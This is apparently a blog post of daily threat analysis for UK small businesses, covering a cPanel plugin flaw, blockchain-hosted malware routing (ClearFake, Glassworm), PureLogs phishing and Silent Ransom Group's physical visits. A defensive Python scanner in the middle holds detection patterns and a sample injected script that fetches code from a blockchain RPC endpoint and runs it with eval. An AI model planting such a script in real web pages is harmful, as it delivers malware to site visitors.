Threat Analysis: Blockchain C2, LiteSpeed cPanel Exploit, and SRG's Physical Pivot, What UK SMBs Need to Know

Hello, Mauven here.

This is your Daily Threat Analysis for 27th May 2026.

Three items today. Two of them are technically significant in ways the headlines are not capturing. One of them represents a behavioural shift that should concern every professional services firm in the UK. I will take them in order of what you need to act on first.


1. Actively Exploited: LiteSpeed cPanel Plugin Flaw, Patch This Today

CISA has added a vulnerability in the LiteSpeed cPanel user-end plugin to its Known Exploited Vulnerabilities catalogue and given US federal agencies four days to remediate. That is the shortest standard remediation window CISA issues, and it is their way of saying this is not theoretical.

The vulnerability allows unauthenticated attackers to exploit the plugin and gain unauthorised access to affected systems. The specific technical details of the exploitation method have not been fully disclosed in public reporting, which is itself a signal: when agencies move this fast without publishing full technical detail, active exploitation is typically already widespread.

Here is what the advisory does not say plainly enough: cPanel is not a government tool. It is one of the most widely deployed web hosting control panels in the world, used by tens of thousands of UK small businesses either directly or through their hosting providers. The federal agency deadline is irrelevant to your situation. What is relevant is that this is being actively exploited right now, today, and the fix exists.

What to do:

  • If you manage your own hosting on cPanel, log into your WHM or cPanel admin and update the LiteSpeed plugin immediately.
  • If your hosting is managed by a third party, contact them today, not this week, today, and ask them to confirm the plugin has been patched.
  • If they tell you it does not affect you without checking, that is a problem with your hosting provider, not the vulnerability.

The NCSC published guidance on keeping web hosting infrastructure patched years ago. The fact that actively exploited vulnerabilities in widely deployed hosting plugins still require a federal agency to issue emergency directives before people act tells you everything about the state of patch management in the hosting industry.


2. ClearFake and Blockchain C2, Why This Changes the Takedown Calculus

Trend Micro has published research on a campaign using the EtherHiding technique to store ClearFake payload routing instructions inside smart contracts on the BNB Smart Chain testnet. The Glassworm botnet, separately reported today by BleepingComputer, used a similar approach: resilient C2 infrastructure distributed across Solana blockchain transactions and the BitTorrent DHT, which required significant effort from researchers to disrupt.

Take a moment to understand what this means operationally.

Traditional malware disruption works by taking down the command-and-control servers, seizing domains, blocking IP ranges, pulling hosting. Blockchain infrastructure does not have a server to seize. Smart contracts, once deployed, are immutable. You cannot take down a Solana transaction. You cannot get a court order against a decentralised ledger. The law enforcement playbook that worked against botnets for the last fifteen years does not straightforwardly apply here.

In the ClearFake campaign, the attack chain begins with JavaScript injected into a compromised website, in the reported case, a Swiss site, that queries the blockchain contract to retrieve malicious payload routing instructions. Victims who pass anti-analysis checks are then delivered infostealers. The ClearFake campaign has historically used ClickFix lures: fake browser update notifications that instruct users to run a script to fix a supposed problem. The script, of course, is the malware.

For UK SMBs, the direct exposure here is twofold. First, your staff visiting legitimate but compromised websites can encounter these lures with no warning. Second, if any part of your business runs websites, and most do, you may be the compromised site delivering the lure to someone else’s employees.

The advisory attributes the ClearFake delivery to compromised third-party websites. What it does not say is that the use of blockchain-based C2 infrastructure represents a structural shift in how persistent and resilient these campaigns can be. Glassworm was disrupted, but it required researchers to find and exploit specific weaknesses in how that particular actor had implemented their blockchain routing. Future implementations will be harder.

What to do:

  • Ensure your web platform, WordPress, Wix, Squarespace custom themes, whatever you use, has all plugins and themes updated and is scanned regularly for injected JavaScript.
  • Deploy browser-level script controls or endpoint detection capable of flagging unusual PowerShell execution on user machines.
  • Brief staff on ClickFix lures specifically: the pattern is a pop-up claiming the browser is broken and asking the user to run a fix. No legitimate website does this.
  • Block outbound connections to blockchain RPC endpoints at your perimeter if your business has no legitimate reason to query them. Most SMBs do not.
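The scanning and blocking advice above can be turned into a first-pass check. The following is an added example, not code from the original analysis or from Trend Micro: it inspects a page's script tags for the combination that characterises EtherHiding-style injection (a browser-side query to a blockchain RPC endpoint followed by decode-and-execute of whatever the contract returns). The RPC hostnames, regexes and sample page are my own assumptions and constructed fixtures; a site owner would maintain the indicator lists from their own intelligence.

```python
import re

# Constructed indicator lists (assumption: defenders maintain these from their
# own threat intel). Hostnames are public chain RPC endpoints used for illustration.
RPC_HOST_RE = re.compile(
    r"(bsc-dataseed\d*\.binance\.org|data-seed-prebsc-[\w-]+\.binance\.org"
    r"|api\.(?:mainnet-beta|devnet)\.solana\.com)", re.I)
# JSON-RPC methods a browser script would use to read contract state or transactions.
RPC_METHOD_RE = re.compile(r"eth_call|eth_getTransactionByHash|getTransaction|getAccountInfo")
EXEC_RE = re.compile(r"\b(eval|Function)\s*\(")
DECODE_RE = re.compile(r"\b(atob|String\.fromCharCode)\s*\(")
SCRIPT_RE = re.compile(r"<script\b([^>]*)>(.*?)</script>", re.I | re.S)
SRC_RE = re.compile(r'src\s*=\s*["\']([^"\']+)["\']', re.I)

def scan_html(html: str) -> list[dict]:
    """Return one finding per suspicious <script>. Any single indicator is weak
    on its own (a crypto site legitimately talks to RPC endpoints); two or more
    together is what a site owner should investigate as possible injection."""
    findings = []
    for idx, (attrs, body) in enumerate(SCRIPT_RE.findall(html)):
        src = SRC_RE.search(attrs)
        reasons = []
        if src and RPC_HOST_RE.search(src.group(1)):
            reasons.append(f"external script loaded from RPC host: {src.group(1)}")
        if RPC_HOST_RE.search(body):
            reasons.append("inline reference to blockchain RPC host")
        if RPC_METHOD_RE.search(body):
            reasons.append("JSON-RPC state-read method in inline script")
        if DECODE_RE.search(body) and EXEC_RE.search(body):
            reasons.append("decode-then-execute pattern (atob/fromCharCode + eval/Function)")
        if reasons:
            findings.append({"script_index": idx, "reasons": reasons,
                             "severity": "high" if len(reasons) >= 2 else "low"})
    return findings

# Constructed sample: a benign analytics tag followed by an injected inline script.
SAMPLE_PAGE = """<html><head>
<script src="https://cdn.example.com/analytics.js"></script>
</head><body><h1>Welcome</h1>
<script>
fetch("https://data-seed-prebsc-1-s1.binance.org:8545", {method: "POST",
  body: JSON.stringify({jsonrpc:"2.0", method:"eth_call", params:[], id:1})})
  .then(r => r.json()).then(j => eval(atob(j.result)));
</script>
</body></html>"""

if __name__ == "__main__":
    for finding in scan_html(SAMPLE_PAGE):
        print(finding)
```

Run it against a saved copy of each page you host; the same regexes also work over web proxy logs if you only keep RPC_HOST_RE and apply it to destination hosts.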

The PureLogs campaign flagged by Fortinet today uses a structurally similar delivery, obfuscated JavaScript in a phishing email leading to PowerShell execution, and is targeting credential theft including cryptocurrency wallets. The technique is consistent. The delivery vector is the same. These are not isolated incidents.


3. Silent Ransom Group Goes Physical, What UK Professional Services Firms Need to Understand

The FBI has issued a warning that the Silent Ransom Group, also tracked as Luna Moth, has escalated its operations to include in-person visits to targeted law firm offices in the United States.

The group’s established methodology involves callback phishing: sending emails that impersonate IT support services, persuading staff to call a number, and then socially engineering them into installing remote access tools. That campaign has been running since at least 2022 and has been consistently effective because it bypasses technical controls entirely: a human being installs the software voluntarily.

The escalation to physical presence is significant. Reports indicate actors have attended offices under the pretext of providing IT support, using the physical visit to either install access tools or exfiltrate data directly.

This is currently reported against US law firms. I want to be precise: I am not aware of confirmed UK incidents from today’s reporting. However, the group’s TTPs translate directly to the UK professional services sector, solicitors, accountants, consultancies, which holds exactly the kind of confidential client data that makes extortion viable. The leap from US to UK targeting for a group already operating transnationally is not a large one.

What to do:

  • Establish a clear policy: no external IT personnel enter your premises without prior written authorisation from your named IT contact or senior management. This should be documented and communicated to all staff, including reception.
  • If someone calls claiming to be from your IT provider, verify by calling your IT provider back on a number you already hold, not one the caller gives you.
  • If you receive an unexpected IT support email asking you to call a number, treat it as suspicious until verified.
  • Review who has physical access to your offices and server rooms. Tailgating, following an authorised person through a secure door, is the oldest physical intrusion technique and it still works.

The NCSC has guidance on social engineering defence. The gap between that guidance existing and UK professional services firms actually implementing it remains significant.


Also Worth Noting

The NCSC published new guidance today on designing Zero Trust Network Access architectures. The substance is sound: the core message is that ZTNA implementations need to be built on genuine zero trust principles rather than bolted onto existing perimeter-trust assumptions. This is a worthwhile read for anyone currently evaluating or deploying ZTNA solutions. It will not help you if you have not patched your cPanel plugin, so get that done first.


Sources

Source | Title | URL
Trend Micro | Smart Contracts for Command and Control: ClearFake and EtherHiding on BSC Testnet | https://www.trendmicro.com/en_us/research/26/e/smart-contracts-for-command-and-control.html
BleepingComputer | CISA gives feds 4 days to patch actively exploited cPanel plugin flaw | https://www.bleepingcomputer.com/news/security/cisa-gives-feds-4-days-to-patch-actively-exploited-cpanel-plugin-flaw/
BleepingComputer | FBI warns of in-person data theft attacks from extortion gang | https://www.bleepingcomputer.com/news/security/fbi-warns-of-silent-ransom-group-in-person-data-theft-attacks/
BleepingComputer | Glassworm botnet disrupted after resilient C2 infrastructure takedown | https://www.bleepingcomputer.com/news/security/glassworm-botnet-disrupted-after-resilient-c2-infrastructure-takedown/
Fortinet | Phishing Campaign Deploys JavaScript-Driven PureLogs Variant to Steal Sensitive Data | https://www.fortinet.com/blog/threat-research/phishing-campaign-deploys-javascript-driven-purelogs-variant-to-steal-sensitive-data
NCSC | Designing secure access with ZTNA | https://www.ncsc.gov.uk/blogs/designing-secure-access-with-ztna

Filed under

  • smb-security
  • uk-business
  • social-engineering
  • credential-theft
  • supply-chain-risk
  • remote-access
  • incident-response